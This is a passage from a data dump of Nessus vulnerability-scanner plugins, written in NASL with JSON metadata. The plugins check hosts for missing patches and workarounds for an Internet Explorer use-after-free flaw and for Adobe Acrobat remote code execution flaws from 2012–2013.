'\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (!mitigation)\n info_user_settings += '\\n ' + key + ' (Active Scripting Enabled)';\n}\n\nRegCloseKey(handle:hku);\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# check if user settings have been overriden by what is in HKLM\n# note: Security_HKLM_only can be set by group policy\nvalue = get_registry_value(handle:hklm, item:'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Security_HKLM_only');\n\nif (info_user_settings != '' && !isnull(value) && value == 1)\n{\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n# \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (mitigation)\n info_user_settings = '';\n}\n\nRegCloseKey(handle:hklm);\n\nclose_registry();\n\nif (info_user_settings != '')\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (emet_info != '')\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n' + emet_info + '\\n';\n else\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The host is not affected since a workaround has been applied.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-02-01T02:11:32", "bulletinFamily": "scanner", "description": "The remote host is missing the workaround referenced in KB 2794220\n(Microsoft ", "modified": "2020-02-02T00:00:00", "id": "SMB_KB2794220.NASL", "href": "https://www.tenable.com/plugins/nessus/63372", "published": "2013-01-02T00:00:00", "title": "MS KB2794220: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)", "type": "nessus", "sourceData": "#@DEPRECATED\n#\n# Disabled on 2013/01/14. Deprecated by smb_nt_ms13-008.nasl\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63372);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSKB\", value:\"2794220\");\n\n script_name(english:\"MS KB2794220: Vulnerability in Internet Explorer Could Allow Remote Code Execution (deprecated)\");\n script_summary(english:\"Checks if 'Fix it' 50971 is in use.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has a web browser installed that is affected by a\nremote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing the workaround referenced in KB 2794220\n(Microsoft 'Fix it' 50971). This workaround mitigates a use-after-free\nvulnerability in Internet Explorer. Without this workaround enabled, an\nattacker could exploit this vulnerability by tricking a user into\nviewing a maliciously crafted web page, resulting in arbitrary code\nexecution. This vulnerability is being actively exploited in the wild.\n\nNote that the Microsoft 'Fix it' solution is effective only if the latest\navailable version of 'mshtml.dll' is installed. \n\nThis plugin has been deprecated due to the publication of MS13-008. \nMicrosoft has released updates that make the workarounds unnecessary. \nTo check for those, use Nessus plugin ID 63522.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2794220\");\n script_set_attribute(attribute:\"solution\", value:\"Apply Microsoft 'Fix it' 50971.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/ProductName\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Use smb_nt_ms13-008.nasl (plugin ID 63522) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1)\n audit(AUDIT_WIN_SERVER_CORE);\n\nie_ver = hotfix_check_ie_version();\nif (ie_ver !~ \"^[678]\\.\") audit(AUDIT_INST_VER_NOT_VULN, 'IE', ie_ver);\n\nport = kb_smb_transport();\nvuln = 0;\n\nregistry_init();\nhandle = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif(!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{a1447a51-d8b1-4e93-bb19-82bd20da6fd2}';\npath = get_registry_value(handle:handle, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\n\nif (isnull(path))\n path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\nRegCloseKey(handle:handle);\nclose_registry(close:FALSE);\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n vuln = FALSE;\nelse\n vuln = TRUE;\n\nhotfix_check_fversion_end();\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus determined the Microsoft \\'Fix it\\' solution is not in use because' +\n '\\nthe following file was not found :\\n\\n' +\n path + '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-06-29T05:59:38", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is equal or prior to 11.0.1 / 10.1.5 / 9.5.3, or is 11.0.1 and missing a workaround fix. Therefore, it is affected by two unspecified remote code execution vulnerabilities.", "modified": "2018-06-27T00:00:00", "published": "2013-02-15T00:00:00", "id": "ADOBE_ACROBAT_APSA13-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64644", "title": "Adobe Acrobat <= 11.0.1 / 10.1.5 / 9.5.3 Multiple Vulnerabilities (APSA13-02)", "type": "nessus", "sourceData": "# @DEPRECATED@\n#\n# This plugin has been deprecated. Use adobe_acrobat_apsb13-07.nasl (plugin #64785) instead.\n#\n# Disabled on 2013/02/21.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64644);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_bugtraq_id(57931, 57947);\n\n script_name(english:\"Adobe Acrobat <= 11.0.1 / 10.1.5 / 9.5.3 Multiple Vulnerabilities (APSA13-02)\");\n script_summary(english:\"Checks version of Adobe Acrobat and registry key\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Adobe Acrobat installed on the remote host is equal or\nprior to 11.0.1 / 10.1.5 / 9.5.3, or is 11.0.1 and missing a workaround\nfix. Therefore, it is affected by two unspecified remote code execution\nvulnerabilities.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to Adobe Acrobat 11.0.1 and apply the workaround described in\nthe advisory.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\", \"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Use adobe_acrobat_apsb13-07.nasl (plugin #64785) instead.\");\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\npath = get_kb_item_or_exit('SMB/Acrobat/Path');\n\nreport = '';\n\nif (\n # 9.x <= 9.5.3\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] <= 3) ||\n\n # 10.x <= 10.1.5\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] <= 5) ||\n\n # 11.x < 11.0.1\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 1)\n)\n{\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 11.0.1 with protected view workaround\\n';\n}\n\nmitigation = FALSE;\n\n# check for mitigation\nif (ver[0] == 11 && ver[1] == 0 && ver[2] == 1)\n{\n registry_init();\n # check for global, non-overrideable mitigation\n hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n key = \"SOFTWARE\\Policies\\Adobe\\Adobe Acrobat\\11.0\\FeatureLockDown\\iProtectedView\";\n ipv = get_registry_value(handle:hklm, item:key);\n RegCloseKey(handle:hklm);\n\n if (!isnull(ipv) && ipv == 0)\n {\n report = '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 11.0.1 with protected view workaround\\n'+\n '\\n Note : Global feature lock down disables protected view.\\n';\n }\n\n if (!isnull(ipv) && ipv > 0)\n {\n mitigation = TRUE;\n }\n else\n {\n # check mitigation per user\n hku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\n subkeys = get_registry_subkeys(handle:hku, key:'');\n foreach key (subkeys)\n {\n # verify adobe is installed and available for user\n key_part = '\\\\SOFTWARE\\\\Adobe\\\\Adobe Acrobat\\\\11.0\\\\InstallPath\\\\';\n install_path = get_registry_value(handle:hku, item:key + key_part);\n\n if (!isnull(install_path))\n {\n key_part = \"\\SOFTWARE\\Adobe\\Adobe Acrobat\\11.0\\TrustManager\\iProtectedView\";\n ipv = get_registry_value(handle:hku, item:key + key_part);\n if (isnull(ipv) || ipv == 0)\n {\n report = '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n SID without workaround : '+ key +\n '\\n Fixed version : 11.0.1 with protected view workaround\\n';\n }\n else\n mitigation = TRUE;\n }\n }\n RegCloseKey(handle:hku);\n }\n close_registry();\n}\n\n\nif (report)\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:report);\n else security_hole(port);\n exit(0);\n}\n\nif (mitigation)\n exit(0, \"The host is not affected since the workaround has been applied.\");\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe Acrobat\", version_report, path);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-02-01T01:42:52", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes two security flaws in Adobe Reader. These flaws are\ndetailed in the Adobe Security bulletin APSB13-07, listed in the\nReferences section. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2013-0640, CVE-2013-0641)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.5.4, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "modified": "2020-02-02T00:00:00", "id": "REDHAT-RHSA-2013-0551.NASL", "href": "https://www.tenable.com/plugins/nessus/64794", "published": "2013-02-22T00:00:00", "title": "RHEL 5 / 6 : acroread (RHSA-2013:0551)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0551. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64794);\n script_version(\"1.29\");\n script_cvs_date(\"Date: 2019/10/24 15:35:36\");\n\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_bugtraq_id(57931, 57947);\n script_xref(name:\"RHSA\", value:\"2013:0551\");\n\n script_name(english:\"RHEL 5 / 6 : acroread (RHSA-2013:0551)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes two security flaws in Adobe Reader. These flaws are\ndetailed in the Adobe Security bulletin APSB13-07, listed in the\nReferences section. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2013-0640, CVE-2013-0641)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.5.4, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb13-07.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb13-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0551\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0640\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0551\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-9.5.4-1.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-plugin-9.5.4-1.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-9.5.4-1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-plugin-9.5.4-1.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-01T02:36:39", "bulletinFamily": "scanner", "description": "Acrobat Reader was updated to 9.5.4 which fixes two critical security\nissues where attackers supplying PDFs could have caused code execution\nwith acrobat. (CVE-2013-0640 / CVE-2013-0641)\n\nMore information can be found on :\n\nhttps://www.adobe.com/support/security/bulletins/apsb13-07.html", "modified": "2020-02-02T00:00:00", "id": "SUSE_ACROREAD-8474.NASL", "href": "https://www.tenable.com/plugins/nessus/64907", "published": "2013-02-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 8474)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64907);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2013/11/18 01:35:30 $\");\n\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 8474)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader was updated to 9.5.4 which fixes two critical security\nissues where attackers supplying PDFs could have caused code execution\nwith acrobat. (CVE-2013-0640 / CVE-2013-0641)\n\nMore information can be found on :\n\nhttps://www.adobe.com/support/security/bulletins/apsb13-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-0640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-0641.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-9.5.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-cmaps-9.4.6-0.6.60\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-ja-9.4.6-0.6.60\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-ko-9.4.6-0.6.60\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-zh_CN-9.4.6-0.6.60\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-zh_TW-9.4.6-0.6.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-01T00:55:07", "bulletinFamily": "scanner", "description": "acroread was updated to 9.5.4 to fix remote code execution problems.\n(CVE-2013-0640, CVE-2013-0641)\n\nMore information can be found on:\n&#9;http://www.adobe.com/support/security/bulletins/apsb13-07.html", "modified": "2020-02-02T00:00:00", "id": "OPENSUSE-2013-151.NASL", "href": "https://www.tenable.com/plugins/nessus/74899", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2013:0335-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-151.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74899);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/19 11:02:42\");\n\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2013:0335-2)\");\n script_summary(english:\"Check for the openSUSE-2013-151 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"acroread was updated to 9.5.4 to fix remote code execution problems.\n(CVE-2013-0640, CVE-2013-0641)\n\nMore information can be found 